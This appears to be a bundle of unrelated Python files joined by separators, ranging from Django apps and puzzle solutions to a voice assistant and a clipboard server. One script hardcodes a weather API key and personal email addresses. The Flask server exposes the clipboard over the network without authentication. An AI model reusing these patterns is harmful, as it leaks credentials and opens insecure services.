est_lat,est_long = self.estimate_loc(dev_id,obs_time)
if DATA_NOT_FOUND in [est_lat,est_long]: continue
D = {'obs_time':[obs_time], 'obs_dev_id':[dev_id],
'est_lat':[est_lat], 'est_long':[est_long],
'obs_var_name':[var_name], 'obs_val':[obs_val]}
per_var.append(pd.DataFrame(D))
if len(per_var) > 0:
cdf = pd.concat(per_var,sort=True) # note: sorting requires pandas 0.23.0
cdf.set_index('obs_time',inplace=True)
#del cdf['obs_var_name'] # don't, in case these DataFrames are merged later
est_d[var_name] = cdf
return est_d
def temp_dataset(self):
rows_with_var = self.df[self.df['obs_var_name'] == 'temp']
temp_plus_metadata = copy.deepcopy(rows_with_var[['obs_time','obs_gps_lat','obs_gps_long','obs_val']])
temp_plus_metadata.drop_duplicates(inplace=True)
return temp_plus_metadata
|
import warnings
import six
from .doc_utils import append_to_doc
__all__ = ['deprecated', 'deprecated_arg']
def _deprecated_warn(message):
warnings.warn(message, category=DeprecationWarning)
def _name_of(target):
return target.__name__
class deprecated(object):
"""
Decorate a class, a method or a function to be deprecated.
Usage::
@deprecated()
def some_function():
...
@deprecated()
class SomeClass:
...
"""
def __init__(self, message='', version=None):
"""
Construct a new :class:`deprecated` object, which can be
used to decorate a class, a method or a function.
Args:
message: The deprecation message to display. It will be appended
to the end of auto-generated message, i.e., the final message
would be "`<name>` is deprecated; " + message.
version: The version since which the decorated target is deprecated.
"""
self._message = message
self._version = version
def __call__(self, target):
if isinstance(target, six.class_types):
return self._deprecate_class(target)
else:
return self._deprecate_func(target)
def _deprecate_class(self, cls):
msg = 'Class `{}` is deprecated'.format(_name_of(cls))
if self._message:
msg += '; {}'.format(self._message)
else:
msg += '.'
# patch the __init__ of the class
init = cls.__init__
def wrapped(*args, **kwargs):
_deprecated_warn(msg)
return init(*args, **kwargs)
cls.__init__ = wrapped
for k in ('__module__', '__name__', '__qualname__', '__annotations__'):
if hasattr(init, k):
setattr(wrapped, k, getattr(init, k))
if six.PY2:
wrapped.__doc__ = self._update_doc(init.__doc__)
else:
cls.__doc__ = self._update_doc(cls.__doc__)
return cls
def _deprecate_func(self, func):
msg = 'Function `{}` is deprecated'.format(_name_of(func))
if self._message:
msg += '; {}'.format(self._message)
else:
msg += '.'
@six.wraps(func)
def wrapped(*args, **kwargs):
_deprecated_warn(msg)
return func(*args, **kwargs)
wrapped.__doc__ = self._update_doc(wrapped.__doc__)
# Add a reference to the wrapped function so that we can introspect
# on function arguments in Python 2 (already works in Python 3)
wrapped.__wrapped__ = func
return wrapped
def _update_doc(self, doc):
def add_indent(s, spaces):
return '\n'.join(spaces + l if l.strip() else ''
for l in s.split('\n'))
appendix = '.. deprecated::'
if self._version:
appendix += ' {}'.format(self._version)
if self._message:
appendix += '\n' + add_indent(self._message, ' ')
return append_to_doc(doc, appendix)
def deprecated_arg(old_arg, new_arg=None, version=None):
since = ' since {}'.format(version) if version else ''
if new_arg is None:
def wrapper(method):
msg = 'In function `{}`: argument `' + str(old_arg) + \
'` is deprecated' + since + '.'
msg = msg.format(_name_of(method))
@six.wraps(method)
def wrapped(*args, **kwargs):
if old_arg in kwargs:
_deprecated_warn(msg)
return method(*args, **kwargs)
return wrapped
else:
def wrapper(method):
msg = 'In function `{}`: argument `' + str(old_arg) + \
'` is deprecated' + since + ', use `' + str(new_arg) + \
'` instead.'
msg = msg.format(_name_of(method))
@six.wraps(method)
def wrapped(*args, **kwargs):
if old_arg in kwargs:
if new_arg in kwargs:
raise TypeError(
'You should not specify the deprecated argument '
'`{}` and its replacement `{}` at the same time.'.
format(old_arg, new_arg)
)
else:
_deprecated_warn(msg)
return method(*args, **kwargs)
return wrapped
return wrapper
|
# Generated by Django 3.2.6 on 2021-08-06 21:12
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('app', '0005_message_questions_asked'),
]
operations = [
migrations.RemoveField(
model_name='message',
name='questions_asked',
),
]
|
# code taken from mit lecture 6 of computer science and programming
# 19 april 2017 - phil welsby
def printMove(fr, to):
print('move from ' + str(fr) + ' to ' + str(to))
def Towers(n, fr, to, spare):
if n == 1:
printMove(fr, to)
else:
Towers(n-1, fr, spare, to)
Towers(1, fr, to, spare)
Towers(n-1, spare, to, fr)
|
import sys
sys.stdin = open("D4_5247_input.txt", "r")
from collections import deque
def bfs(n):
q = deque([[n, 0]])
while q:
num, count = q[0]
if num > M + 11:
q.popleft()
continue
flag = 1
temp = []
temp.append(num + 1)
temp.append(num * 2)
temp.append(num - 1)
temp.append(num - 10)
count += 1
for i in temp:
if 0 <= i < M + 11 and counts[i] > count:
counts[i] = count
flag = 0
q.append([i, count])
if flag:
q.popleft()
T = int(input())
for test_case in range(T):
N, M = map(int, input().split())
counts = [float('inf')] * (M + 11)
bfs(N)
print("#{} {}".format(test_case + 1, counts[M])) |
def jusifyText(words, k):
# text = ' '.join(words)
# print(text)
last_word = words.pop()
line = ""
words_lines = []
words_to_use = []
while words:
word = words.pop(0)
if len(line)+len(word)+1<=k:
words_to_use.append(word)
line = line+word+" "
else:
words_lines.append(words_to_use)
words_to_use = [word]
line = word+" "
if len(line)+len(last_word)<=k:
words_to_use.append(last_word)
line = line+last_word
else:
words_lines.append(words_to_use)
words_to_use = [word]
line = word
words_lines.append(words_to_use)
# print(words_lines)
actual_lines = []
for words_line in words_lines:
num_words = len(words_line)
num_space_places = num_words-1
word_space = sum(len(word) for word in words_line)
blank_space = k-word_space
spaces = [0 for _ in range(num_space_places)]
i = 0
while blank_space>0:
spaces[i]+=1
if i==num_space_places-1:
i=0
else:
i+=1
blank_space-=1
# print(spaces)
real_spaces = [" "*space for space in spaces]
actual_line = ""
while real_spaces:
actual_line += words_line.pop(0)
actual_line += real_spaces.pop(0)
actual_line+=words_line.pop(0)
actual_lines.append(actual_line)
return actual_lines
if __name__=='__main__':
words = ["the", "quick", "brown", "fox", "jumps", "over", "the", "lazy", "dog"]
k = 16
text = jusifyText(words, k)
for line in text:
print(line)
|
from time import perf_counter
import re
from collections import Counter
def profiler(method):
def wrapper_method(*arg, **kw):
t = perf_counter()
ret = method(*arg, **kw)
print('Method ' + method.__name__ + ' took : ' +
"{:2.5f}".format(perf_counter()-t) + ' sec')
return ret
return wrapper_method
@profiler
def part1():
p = open("day22/input.txt").read().split("\n\n")
grid = {}
direction = 0
moves = {
0: (1, 0),
1: (0, 1),
2: (-1, 0),
3: (0, -1),
}
for y, l in enumerate(p[0].splitlines()):
for x, c in enumerate(l):
if c in [".", "#"]:
if len(grid) == 0:
pos = (x, y)
grid[(x, y)] = c
path = re.findall(r"\w?\d+", p[1])
for s in path:
if "R" in s:
direction = (direction + 1) % 4
s = s.replace("R", "")
elif "L" in s:
direction = (direction - 1) % 4
s = s.replace("L", "")
for _ in range(int(s)):
if (pos[0] + moves[direction][0], pos[1] + moves[direction][1]) in grid:
if grid[(pos[0] + moves[direction][0], pos[1] + moves[direction][1])] == ".":
pos = (pos[0] + moves[direction][0],
pos[1] + moves[direction][1])
else:
break
else:
if direction in [0, 2]:
x = {
0: min([tile[0] for tile in grid if tile[1] == pos[1]]),
2: max([tile[0] for tile in grid if tile[1] == pos[1]]),
}
n_pos = (x[direction], pos[1])
else:
y = {
1: min([tile[1] for tile in grid if tile[0] == pos[0]]),
3: max([tile[1] for tile in grid if tile[0] == pos[0]]),
}
n_pos = (pos[0], y[direction])
if grid[n_pos] == ".":
pos = n_pos
else:
break
assert(pos in grid and grid[pos] == ".")
print(1000*(pos[1]+1) + 4 * (pos[0]+1) + direction)
def get_face(p):
# /-----X-----\
# | 1 | 2 |
# X-----X-----/
# | 3 |
# /-----X-----X
# | 5 | 4 |
# X-----x-----/
# | 6 |
# \-----/
x, y = p
if y // 50 == 0:
return x // 50
elif y // 50 == 1:
return 3
elif y // 50 == 2:
return {0: 5, 1: 4}[x // 50]
else:
return 6
@profiler
def part2():
p = open("day22/input.txt").read().split("\n\n")
grid = {}
direction = 0
moves = {
0: (1, 0),
1: (0, 1),
2: (-1, 0),
3: (0, -1),
}
# from (face number, direction) to (new direction, conversion between coordinates lambda)
# Facing is 0 for right (>), 1 for down (v), 2 for left (<), and 3 for up (^)
wrap = {
(1, 2): (0, lambda x, y: (0, 149 - y)),
(1, 3): (0, lambda x, y: (0, x+100)),
(2, 0): (2, lambda x, y: (99, 149-y)),
(2, 1): (2, lambda x, y: (99, x-50)),
(2, 3): (3, lambda x, y: (x-100, 199)),
(3, 0): (3, lambda x, y: (y+50, 49)),
(3, 2): (1, lambda x, y: (y-50, 100)),
(4, 0): (2, lambda x, y: (149, 149-y)),
(4, 1): (2, lambda x, y: (49, 100+x)),
(5, 2): (0, lambda x, y: (50, 149-y)),
(5, 3): (0, lambda x, y: (50, 50+x)),
(6, 0): (3, lambda x, y: (y-100, 149)),
(6, 1): (1, lambda x, y: (x+100, 0)),
(6, 2): (1, lambda x, y: (y-100, 0)),
}
for y, l in enumerate(p[0].splitlines()):
for x, c in enumerate(l):
if c in [".", "#"]:
if len(grid) == 0:
pos = (x, y)
grid[(x, y)] = c
path = re.findall(r"\w?\d+", p[1])
for s in path:
if "R" in s:
direction = (direction + 1) % 4
s = s.replace("R", "")
elif "L" in s:
direction = (direction - 1) % 4
s = s.replace("L", "")
for _ in range(int(s)):
if (pos[0] + moves[direction][0], pos[1] + moves[direction][1]) in grid:
if grid[(pos[0] + moves[direction][0], pos[1] + moves[direction][1])] == ".":
pos = (pos[0] + moves[direction][0],
pos[1] + moves[direction][1])
else:
break
else:
n_d, fn = wrap[(get_face(pos), direction)]
n_pos = fn(pos[0], pos[1])
assert(n_pos in grid)
if n_pos not in grid:
pass
if grid[n_pos] == ".":
direction = n_d
pos = n_pos
else:
break
print(1000*(pos[1]+1) + 4 * (pos[0]+1) + direction)
if __name__ == "__main__":
part1()
part2()
|
import traceback
from flask import Flask, request
from f6.win32 import from_clipboard, to_clipboard
app = Flask(__name__)
@app.route('/clip', methods=['GET'])
def get_clip():
try:
data = from_clipboard()
return data if data else ''
except Exception:
traceback.print_exc()
return ''
@app.route('/clip', methods=['POST'])
def post_clip():
data = request.data
data = data.replace('\n', '\r\n')
to_clipboard(data)
return data
if __name__ == '__main__':
app.run(host='192.168.56.1', port=6563, threaded=True)
|
from django.shortcuts import render
from django.contrib.auth.models import User, Group
from models import Product, Purchase
from rest_framework import viewsets, status
from serializers import UserSerializer, GroupSerializer, ProductSerializer, PurchaseSerializer
from rest_framework.response import Response
class UserViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows users to be viewed or edited.
"""
queryset = User.objects.all().order_by('-date_joined')
serializer_class = UserSerializer
class GroupViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows groups to be viewed or edited.
"""
queryset = Group.objects.all()
serializer_class = GroupSerializer
class ProductViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows Products to be viewed or edited.
"""
#overwrinting method
def update(self, request, *args, **kwargs):
#updating attribute average_price updates all docs with the same name
if request.data.has_key('average_price') and request.data.has_key('name'):
Product.objects.filter(name=request.data['name']).update(average_price=request.data['average_price'])
partial = kwargs.pop('partial', False)
instance = self.get_object()
serializer = self.get_serializer(instance, data=request.data, partial=partial)
serializer.is_valid(raise_exception=True)
self.perform_update(serializer)
return Response(serializer.data)
def create(self, request, *args, **kwargs):
#create attribute average_price updates all docs with the same name
#in case object name already exists we have to update
if request.data.has_key('average_price') and request.data.has_key('name'):
Product.objects.filter(name=request.data['name']).update(average_price=request.data['average_price'])
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
queryset = Product.objects.all()
serializer_class = ProductSerializer
class PurchaseViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows Purchases to be viewed or edited.
"""
queryset = Purchase.objects.all()
serializer_class = PurchaseSerializer |
from django.db import models
# Create your models here.
class product(models.Model):
product_id = models.AutoField
product_name = models.CharField(max_length = 100)
category=models.CharField(max_length = 100,default = "")
subcategory=models.CharField(max_length = 100,default = "")
price=models.IntegerField(default = 0)
desc = models.CharField(max_length = 300)
pub_date = models.DateField()
image=models.ImageField(upload_to = 'shop/images',default = "")
def __str__(self):
return self.product_name
class Contact(models.Model) :
msg_id=models.AutoField(primary_key = True)
name=models.CharField(max_length = 100)
email=models.CharField(max_length = 100 , default = "")
phone=models.CharField(max_length = 100 , default = "")
desc=models.CharField(max_length = 5000 , default = "")
def __str__(self) :
return self.name
class Order(models.Model):
order_id=models.AutoField(primary_key = True)
items_json=models.CharField(max_length = 5000)
amount=models.IntegerField(default = 0)
name=models.CharField(max_length = 100)
email=models.CharField(max_length = 100)
address=models.CharField(max_length = 500)
city=models.CharField(max_length = 100)
state=models.CharField(max_length = 100)
zip_code=models.CharField(max_length = 100)
phone=models.CharField(max_length = 100,default="")
class OrderUpdate(models.Model):
update_id=models.AutoField(primary_key=True)
order_id=models.IntegerField(default = "")
update_desc=models.CharField(max_length = 5000)
timestamp=models.DateField(auto_now_add = True)
def __str__(self):
return self.update_desc[0:7] + "..."
|
"""
@author: yyuuliang
project: https://github.com/yyuuliang/tf-api-example
Convert Autti's csv to gt.txt
"""
import os
import sys
import csv
def csv_txt():
labels = {'"car"': 1,
'"truck"': 2,
'"pedestrian"': 3,
'"trafficLight"': 4,
'"biker"': 5,
}
csv_fname = os.path.join('dataset/autti/train.csv')
idx = 0
gt2 = open('dataset/autti/gt2.txt','w')
fidx = -1
last_img_name = ''
with open(csv_fname, 'r') as csvfile:
spamreader = csv.reader(csvfile, delimiter=' ', quotechar='|', )
for row in spamreader:
img_name = row[0]
if last_img_name != img_name:
last_img_name = img_name
fidx = fidx +1
img_name_idx = str(fidx).zfill(5)
xmin = int(row[1])
ymin = int(row[2])
xmax = int(row[3])
ymax = int(row[4])
class_name = row[6]
class_id = labels[class_name]
gtstr = '{}.jpg;{};{};{};{};{}\n'.format(img_name_idx,xmin,ymin,xmax,ymax,class_id)
gt2.write(gtstr)
gt2.close()
if __name__ == '__main__':
csv_txt() |
# David Powis-Dow CS 101:Python
# 2016-12-03 v0.1
# Chapter 4 : Exercise Turtle Functions
import turtle
def make_window (colr, ttle):
"""
Set up the window with the given background colar and title.
Returns the new window.
"""
w = turtle.Screen()
w.bgcolor(colr)
w.title(ttle)
return w
def make_turtle (colr, pensz):
"""
Set up a given turtle with a give color and pensize.
Returns the new turtle.
"""
t = turtle.Turtle()
t.color(colr)
t.pensize(pensz)
return t
def draw_poly (t, n, sz):
"""
Create t Turtle of n sides and sz size polygon.
"""
for i in range(n):
t.forward(sz)
t.left(360/n)
return t
wn = make_window("azure", "Repeating Squares")
tess = make_turtle("hotpink", 5)
#sq_increment = 20 # Set the increment for increasing the size of the square
draw_poly(tess, 8, 50)
wn.mainloop()
#alex = make_turtle("black", 1)
#dave = make_turtle("yellow", 2)
|
from __future__ import print_function
import Pyro4
import bouncer
# you could set a comm timeout to avoid the deadlock situation...:
# Pyro4.config.COMMTIMEOUT = 2
with Pyro4.Daemon() as daemon:
uri = daemon.register(bouncer.Bouncer("Server"))
Pyro4.locateNS().register("example.deadlock", uri)
print("This bounce example will deadlock!")
print("Read the source or Readme.txt for more info why this is the case!")
print("Bouncer started.")
daemon.requestLoop()
|
# What will the output of this be?
favouriteFood = ["apples","bananas"]
print("My favourite food are: " + favouriteFood[0] + " and " + favouriteFood[1]) |
import pyttsx3
import datetime
import speech_recognition as sr
import wikipedia
import webbrowser
import os
import smtplib
import pyautogui
import psutil
import pyjokes
import requests
import json
def speak(audio):
engine.say(audio)
engine.runAndWait()
def wishMe():
hour = int(datetime.datetime.now().hour)
if hour >= 0 and hour < 12:
speak("Good Morning!")
elif hour >= 12 and hour < 18:
speak("Good Afternoon!")
else:
speak("Good Evening!")
speak("I am Jarvis,how may I help you")
def takeCommand():
"""
Takes microphone input from the user and returns string output
"""
r = sr.Recognizer()
with sr.Microphone() as source:
print("Listening...")
r.pause_threshold = 1
audio = r.listen(source)
try:
print("Recognizing...")
query = r.recognize_google(audio, language = 'en-in')
print(f"User said: {query}\n")
except Exception as e:
print("Say that again please...")
return "None"
return query
def sendEmail(to,content):
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login('youremail@gmail.com', 'yourpassword')
server.sendmail('youremail@gmail.com', to, content)
server.close()
def takeSnap():
img = pyautogui.screenshot()
img.save("C:\\Users\\DIV CHAUDHARY\\Desktop\\Python\\a.png")
engine = pyttsx3.init('sapi5')
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[0].id)
def cpu():
usage = str(psutil.cpu_percent())
speak("CPU is at " + usage)
battery = psutil.sensors_battery()
print(battery)
def climate():
speak("Please Enter the city name")
city = input("City Name: ")
url = "http://api.openweathermap.org/data/2.5/weather?q={}&appid=fd42803ff8f720819345518a2c8ec0e8".format(city)
res = requests.get(url)
data = res.json()
desc = data['weather'][0]['description']
print("Description: ",desc)
if __name__ == "__main__":
wishMe()
while(1):
query = takeCommand().lower()
#Logic for executing tasks based on query
if 'wikipedia' in query:
speak('Searching Wikipedia...')
query = query.replace("wikipedia","")
results = wikipedia.summary(query, sentences=2)
speak("According to wikipedia")
print(results)
speak(results)
elif 'open youtube' in query:
webbrowser.open("www.youtube.com")
elif 'open google' in query:
webbrowser.open("www.google.com")
elif 'open geeks for geeks' in query:
webbrowser.open("www.geeksforgeeks.org")
elif 'play music' in query:
music_dir = 'H:\\Music'
songs = os.listdir(music_dir)
os.startfile(os.path.join(music_dir,songs[0]))
elif 'the time' in query:
strTime = datetime.datetime.now().strftime("%H:%M:%S")
speak(f"Sir, the time is {strTime}")
elif 'open code' in query:
codePath = "C:\\Users\\DIV CHAUDHARY\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
os.startfile(codePath)
elif 'email to ajay' in query:
try:
speak("What is the message")
content = takeCommand()
to = "ajaymgc@yahoo.com"
sendEmail(to, content)
speak("Email has been sent")
except Exception as e:
speak("Sorry sir,I am unable to send this email currently.")
elif 'remember that' in query:
speak('What should I remember?')
data = takeCommand()
remember = open("data.txt", "w")
remember.write(data)
remember.close()
elif 'remind me' in query:
remember = open("data.txt", "r")
speak("You said me to remember that" + remember.read())
remember.close()
elif 'take screenshot' in query:
takeSnap()
speak("Screenshot Taken")
elif 'cpu' in query:
cpu()
elif 'weather' in query:
climate()
elif 'shutdown' in query:
os.system('shutdown /p /f')
elif 'go offline' in query:
exit() |
#英制单位英寸和公制单位厘米互换
value=float(input('请输入长度:'))
unit=input('请输入单位:')
if unit=='in' or unit=='英寸':
print('%f英寸=%f厘米'%(value,value*2.54))
elif unit=='cm'or unit=='厘米':
print('%f厘米=%f英寸'%(value,value/2.54))
else:
print('请输入有效的单位')
|
import math
import pygame
from coord_sys import CoordSys
from map import Map
def transform_pic(pic, width, height):
return pygame.transform.scale(pic, (int(width), int(height)))
class MapSprite(pygame.sprite.DirtySprite):
def __init__(self, get_image, name):
pygame.sprite.DirtySprite.__init__(self)
self.name = name
self.get_image = get_image
self.image = get_image()
self.rect = self.image.get_rect()
def draw(self, screen, pos):
#screen.blit(self.image, [self.view_pos_x, self.view_pos_y, self.rect[2], self.rect[3]])
screen.blit(self.image, pos)
"""
class Grass(MapSprite):
def __init__(self):
MapSprite.__init__(self, lambda: Grass_image, "Grass")
class Dirt(MapSprite):
def __init__(self):
MapSprite.__init__(self, lambda: Dirt_image, "Dirt")
class Water(MapSprite):
def __init__(self):
MapSprite.__init__(self, lambda: Water_image, "Water")
class Rock(MapSprite):
def __init__(self):
MapSprite.__init__(self, lambda: Rock_image, "Rock")
"""
class BlockMap:
def __init__(self, map):
self.map = map
self.load_pics()
def load_pics(self):
self.grass = pygame.image.load("images/Grass.jpg").convert()
self.dirt = pygame.image.load("images/Dirt.jpg").convert()
self.water = pygame.image.load("images/Water.jpg").convert()
self.rock = pygame.image.load("images/Rock.jpg").convert()
self.flowers = pygame.image.load("images/flowers.png").convert_alpha()
self.tree = pygame.image.load("images/tree.png").convert_alpha()
def resize_sprites(self, w, h):
self.grass_sprite = transform_pic(self.grass, w, h)
self.dirt_sprite = transform_pic(self.dirt, w, h)
self.water_sprite = transform_pic(self.water, w, h)
self.rock_sprite = transform_pic(self.rock, w, h)
self.tree = transform_pic(self.tree, w, h)
self.flowers = transform_pic(self.flowers, w, h)
def get_sprites(self, row, col):
field = self.map.get_field(row, col)
if field == Map.GRASS: return self.grass_sprite
if field == Map.WATER: return self.water_sprite
if field == Map.DIRT: return self.dirt_sprite
if field == Map.ROCK: return self.rock_sprite
raise Exception('Unknown field type %d' % field)
def create_canvas(self, width, height):
size = max(width, height)
delta = size / self.map.rows
block_width = math.ceil(delta)
block_height = math.ceil(delta)
self.resize_sprites(block_width, block_height)
self.coord_sys = CoordSys(pygame.Rect((0,0), (size, size)))
self.canvas = pygame.Surface((size, size))
y = 0
for row in range(self.map.rows):
x = 0
for col in range(self.map.cols):
sprite = self.get_sprites(row, col)
self.canvas.blit(sprite, (x, y))
x += delta
y += delta
#print("Final size: %s, %s" % (x, y))
def update(self, width, height):
width = int(width)
height = int(height)
size = max(width, height)
self.coord_sys = CoordSys(pygame.Rect((0,0), (size, size)))
self.zoom_canvas = pygame.transform.scale(self.canvas, (size, size))
#print("Final size: %s, %s" % (x, y))
def draw(self, screen, view_port):
screen.blit(self.zoom_canvas, (0, 0), area=view_port)
|
# Imports
from twilio.rest import Client
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import *
import requests
import json
import os
# Global Setup
# TODO: Store those values in environment variables to retrieve them later (https://www.youtube.com/watch?v=5iWhQWVXosU)
# WEBHOOK_URL - Webhook URL for the Slack channel that you would like to post to
# ENDPOINT - URL of the endpoint that you're hitting executing your Data Explorer query
# API_KEY - Key that you can generate in API section in your Discourse Dashboard
# ACCOUNT_SID - Parameter that you can grab by logging into your Twilio Console (https://www.youtube.com/watch?v=knxlmCVFAZI)
# AUTH_TOKEN - Authentication token that you can grab from Twilio Console as well
# FROM_NUMBER - Your Twilio phone number that you will be sending the SMS from. Grab it from Twilio Console
# TO_NUMBER - Phone number that you will be sending the SMS to
# SENDGRID_KEY - Your API KEY that you can use to develop solutions using SendGrid services (https://www.youtube.com/watch?v=xCCYmOeubRE&t=19s)
# API_USERNAME - Put system if yoy created the API Key for all users otherwise put in your Discourse username
WEBHOOK_URL = os.environ['LEADERBOARD_WEBHOOK_URL']
ENDPOINT = os.environ['LEADERBOARD_ENDPOINT']
API_KEY = os.environ['LEADERBOARD_API_KEY']
ACCOUNT_SID = os.environ['TWILIO_ACCOUNT_SID']
AUTH_TOKEN = os.environ['TWILIO_AUTH_TOKEN']
FROM_NUMBER = os.environ['TWILIO_LEADERBOARD_FROM_NUMBER']
TO_NUMBER = os.environ['TWILIO_LEADERBOARD_TO_NUMBER']
SENDGRID_KEY = os.environ['SENDGRID_KEY']
API_USERNAME = 'system'
twilio_client = Client(ACCOUNT_SID, AUTH_TOKEN)
# Core Functions
def fetch_leaderboard():
headers = {'Content-Type': 'multipart/form-data', 'Api-Key': API_KEY, 'Api-Username': API_USERNAME}
request = requests.post(url = ENDPOINT, headers = headers)
print("Request Status Code: {}".format(request.status_code))
# Unprocessed API request response
response = json.loads(request.text)
# Processed API request response - now it's parsed into a dictionary
# TODO: Based on your query you will need to adjust the syntax below to access the dictionary element of your choice
response_rows = response["rows"]
first_place = {'Name': response_rows[0][1],
'Email': response_rows[0][2],
'Total_Points': response_rows[0][6]}
second_place = {'Name': response_rows[1][1],
'Email': response_rows[1][2],
'Total_Points': response_rows[1][6]}
third_place = {'Name': response_rows[2][1],
'Email': response_rows[2][2],
'Total_Points': response_rows[2][6]}
winners_names_emails = [(first_place['Email'], first_place['Name']), (second_place['Email'], second_place['Name']),
(third_place['Email'], third_place['Name'])]
response_text = "Community Leaderboard 🏆\n🥇 {} ({}) - {} pts\n🥈 {} ({}) - {} pts\n🥉 {} ({}) - {} pts".format(first_place['Name'], first_place['Email'], first_place['Total_Points'], second_place['Name'], second_place['Email'], second_place['Total_Points'], third_place['Name'], third_place['Email'], third_place['Total_Points'])
# Output Form
# Community Leaderboard 🏆
# 🥇 John Doe (john.doe@gmail.com) - 51 pts
# 🥈 Caroline Doe (caroline@yahoo.com) - 34 pts
# 🥉 John Keller (johnkeller@gmail.com) - 12 pts
return response_text, winners_names_emails
def post_to_slack(leaderboard):
slack_message = {'text': leaderboard}
requests.post(WEBHOOK_URL, json.dumps(slack_message))
def send_leaderboard_via_sms_to_prize_sender(leaderboard):
message = twilio_client.messages.create(
body = leaderboard,
from_= FROM_NUMBER,
to = TO_NUMBER)
def notify_top_contributors_via_email(leaderboard, winners_emails):
# Whether if you want to hide your from email or not you can also store it in environment variables
# TODO: Fill in from_email and adjust subject + html_content / plain_content based on your needs
message = Mail(
from_email = ('konrad.sopala@auth0.com', 'Konrad Sopala'),
subject = 'Auth0 Community - Leaderboard 🏆',
html_content = '',
plain_text_content = 'Congrats for your efforts last month! We really appreciate it! You have been one of Top 3 performers in our community forum. Someone from Auth0 will contact you shortly to send you some secret SWAG\n{}'.format(leaderboard),
to_emails = winners_emails,
is_multiple = True)
# Email Form
# Congrats for your efforts last month! We really appreciate it! You have been one of Top 3 performers in our community forum.
# Someone from Auth0 will contact you shortly to send you some secret SWAG!
# Community Leaderboard 🏆
# 🥇 John Doe (john.doe@gmail.com) - 51 pts
# 🥈 Caroline Doe (caroline@yahoo.com) - 34 pts
# 🥉 John Keller (johnkeller@gmail.com) - 12 pts
sendgrid_client = SendGridAPIClient(SENDGRID_KEY)
response = sendgrid_client.send(message)
print(response.status_code)
processed_leaderboard = fetch_leaderboard()
post_to_slack(processed_leaderboard[0])
send_leaderboard_via_sms_to_prize_sender(processed_leaderboard[0])
notify_top_contributors_via_email(processed_leaderboard[0], processed_leaderboard[1])
|
from collections import Counter
dict1 = {'1': 100, '2': 200, '3':70}
dict2 = {'1': 300, '2': 200, '3':400}
d = Counter(dict1) + Counter(dict2)
print(d)
|
import tensorflow as tf
import numpy as np
import argparse
from artistic_style import imread
from artistic_style import imsave
from artistic_style import transfer_style
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('content',
help='image to be transformed')
parser.add_argument('-o', '--output',
help='output file',
required=True)
parser.add_argument('-m', '--model',
help='pretrained model',
required=True)
args = parser.parse_args()
return args
def main():
args = parse_args()
content_filename = args.content
output_filename = args.output
model_weights_filename = args.model
content = imread(content_filename)
out = transfer_style(content, model_weights_filename)
imsave(output_filename, out)
if __name__ == '__main__':
main()
|
#import libraries
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import linear_model
#load dataset
data=pd.read_csv("C:\\Users\\54721\\OneDrive\\Desktop\\kagle dataset\\linear regression dataset\\train.csv")
#quick view about the dataset
print(data)
#Return a tuple representing the dimensionality of the DataFrame.
print(data.shape)
#data.plot(kind='scatter',x="x",y="y")
# plt.show()
#data.plot(kind='box')
# plt.show()
#correlation coeffecients
#print(data.corr())
#change to dataframe variable
X_axis=pd.DataFrame(data['x'])
print(X_axis)
Y_axis=pd.DataFrame(data['y'])
print(Y_axis)
#build linear regression model
lm = linear_model.LinearRegression()
model = lm.fit(X_axis,Y_axis)
print(model.predict(X_axis))
print(model.coef_)
print(model.intercept_)
#evaluate the model
print(model.score(X_axis,Y_axis))
#predict new value of Y
X_axis_new = [[24]]
Y_axis_predict = model.predict(X_axis_new)
print(Y_axis_predict)
#predict more values
a= [6,78,91]
a=pd.DataFrame(a)
print(a)
#change the column name from 0 to any string value otherwise keyerror occur when plotting graph.
a.columns = ['x']
print(a)
b=model.predict(a)
print(b)
df=pd.DataFrame(b)
print(df)
#visualize the results
data.plot(kind='scatter',x= 'x' ,y='y')
#plotting the regression line
plt.plot(X_axis,model.predict(X_axis),color='red',linewidth=2)
#plotting the predicted value for X_axis_new = [[24]]
plt.scatter(X_axis_new,Y_axis_predict,color='yellow')
#plotting the predicted value for sample a= [6,78,91]
plt.scatter(a,b,color='green',linewidth=3)
#blue line connecting the new values of y for new sample data a= [6,78,91]
plt.plot(a,b,color='blue',linewidth=3)
#show the graph
plt.show()
|
#!/usr/bin/env python3
# SlicingExample.py - prompt user for a URL and then extract
# the domain name for that input
# input should be in the form --> http://www.somethinghere.com
url = input('Please enter the compete URL (http://www.xyz.com): ')
domain = url[11:-4]
print(domain)
|
import numpy as np
import sys
from matplotlib import pyplot as plt
def read():
A = np.loadtxt('rtsim.dat')
cav = abs(A[:, 0] + 1j*A[:, 1])
fwd = abs(A[:, 2] + 1j*A[:, 3])
rfl = abs(A[:, 4] + 1j*A[:, 5])
return cav, fwd, rfl
def show(data):
cav, fwd, rfl = data
plt.plot(cav, label='cav')
plt.plot(fwd, label='fwd')
plt.plot(rfl, label='rfl')
plt.legend()
plt.show()
def fail_pass(condition):
if not condition:
print('FAIL')
sys.exit(1)
else:
print('PASS')
def check_err(test_val, bound, err):
check = abs(test_val - bound) < err
print(test_val, bound, err, check)
return check
def make_check(data):
cav, fwd, rfl = data
err_bar = 10
fail_pass(check_err(cav[-1], 8739, err_bar) and
check_err(fwd[-1], 6714, err_bar) and
check_err(rfl[-1], 6022, err_bar))
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description='rtsim')
parser.add_argument('-c', '--check', action='store_true', default=True,
help='Purely run the check')
parser.add_argument('-s', '--show', action='store_true',
help='Show plots')
args = parser.parse_args()
data = read()
if args.show:
make_check(data)
show(data)
else:
make_check(data)
|
class player:
"""docstring for """
def __init__(self, name, grade, isMember = False):
self.name = name
self.isMember = isMember
self.grade = grade
def getGrade(self):
return self.grade
def getName(self):
return self.name
def getIsMember(self):
return self.isMember
|
#
# @lc app=leetcode id=268 lang=python3
#
# [268] Missing Number
#
from typing import List
# @lc code=start
